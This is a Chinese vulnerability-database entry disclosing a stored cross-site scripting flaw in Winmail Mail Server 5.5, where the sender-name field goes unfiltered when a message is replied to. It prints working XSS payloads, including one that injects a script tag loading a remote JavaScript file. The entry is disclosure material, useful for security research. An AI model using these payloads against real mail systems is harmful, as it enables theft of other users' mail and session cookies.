winmail邮件系统存储型跨站

基本字段

漏洞编号：: SSV-96091

披露/发现时间：: 2014-10-22

提交时间：: 2014-10-22

漏洞等级：

漏洞类别：: 其他类型

影响组件：: WinWebMail

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-079201

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： winmail最近刚刚升级为最新版本，但系统存在一处XSS漏洞，利用该漏洞，我们可以盗取任意用户邮件内容和COOKIE信息，以及进行一些其他恶意操作。 ### 详细说明： 1、涉及版本：Winmail Mail Server5.5 2、winmail邮件系统对发件人字段进行了过滤，但是在回复邮件时，系统会重新读取发件人，系统重新读取后，并没有对发件人字段进行过滤，导致存储型XSS的触发。 3、系统演示站点：http://demo.magicwinmail.com:6080/ ### 漏洞证明： 1、登录系统--》配置箱--》使用偏好，将发件人名字改为`<img src=x onerror=alert(/xss/)>` [<img src="https://images.seebug.org/upload/201410/1316321465a76204aa5b2e25056f299216b2101f.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1316321465a76204aa5b2e25056f299216b2101f.png) 2、发送邮件给被攻击者，被攻击用户登录邮件系统，查看邮件，系统对发件人字段已经进行了过滤，点击"回复"或"回复所有",漏洞触发： [<img src="https://images.seebug.org/upload/201410/131634130a2d880b6b2c2df65012e845cf77169d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131634130a2d880b6b2c2df65012e845cf77169d.png) [<img src="https://images.seebug.org/upload/201410/13163423c8e01db1ee26b0e2a211486c9badf10b.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/13163423c8e01db1ee26b0e2a211486c9badf10b.png) 3、使用Firebug查看页面源代码： [<img src="https://images.seebug.org/upload/201410/1316350034eea576e22b7f5d154e456383d1a3e8.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1316350034eea576e22b7f5d154e456383d1a3e8.png) onerror事件成功执行，漏洞存在点为图中红色区域处。 [<img src="https://images.seebug.org/upload/201410/131635550291248f452e972d997472761edadc1b.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131635550291248f452e972d997472761edadc1b.png) 4、在使用偏好处将发件人名字修改为：<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);> 回复时漏洞触发，成功加载本地脚本： [<img src="https://images.seebug.org/upload/201410/131637256f383f045d7ef99371fa07ca442598a3.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131637256f383f045d7ef99371fa07ca442598a3.png) 通过修改脚本内容，我们可以进行针对性的攻击。

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-079201

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

winmail邮件系统存储型跨站

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定